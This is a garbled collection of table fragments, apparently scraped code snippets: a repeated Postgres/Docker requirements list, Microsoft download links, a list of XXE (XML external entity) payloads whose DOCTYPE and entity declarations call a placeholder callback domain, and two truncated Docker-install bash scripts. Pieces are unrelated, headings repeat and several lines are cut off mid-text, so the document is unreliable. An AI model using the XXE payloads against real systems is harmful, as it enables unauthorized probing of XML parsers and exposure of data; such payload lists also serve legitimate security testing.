What would you need:
- Postgres 9.3, 9.4, 9.5, 9.6 or 10 with cstore_fdw extention (https://github.com/citusdata/cstore_fdw)
- Docker 1.12.6 or higher
- Docker Compose
- Linux machine
Hardware requirements
What would you need:
Hardware requirements
| https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/MgmtSvc-Usage.msi | |
| https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/MgmtSvc-WebAppGallery.msi | |
| https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/MgmtSvc-WindowsAuthSite.msi | |
| https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/PrivacyStatement_RTM_2013.docx | |
| https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/THIRDPARTYNOTICES_RTM_2013.rtf | |
| https://download.microsoft.com/download/0/B/5/0B523C6F-4B2C-4F3E-80B8-F8D7FE69A3EA/TFS2012-KB2989277.exe | |
| https://download.microsoft.com/download/3/6/8/3683FA84-BDF4-479E-9E64-495AF6605EB2/TFS2013-KB2989279.exe | |
| https://download.microsoft.com/download/3/B/5/3B5991CA-8B23-4A18-9DB5-1EDB867AD508/Microsoft%20Azure%20Certification%20Test%20Tool%201.1%20for%20Hybrid%20Cloud.msi |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
| #!/bin/bash | |
| export DEBIAN_FRONTEND="noninteractive" | |
| # remove previously installed Docker | |
| apt-get purge lxc-docker* | |
| apt-get purge docker.io* | |
| # add Docker repo | |
| apt -y install apt-transport-https ca-certificates dirmngr |
| #!/bin/bash | |
| # update apt-get | |
| export DEBIAN_FRONTEND="noninteractive" | |
| sudo apt-get update | |
| # remove previously installed Docker | |
| sudo apt-get purge lxc-docker* | |
| sudo apt-get purge docker.io* |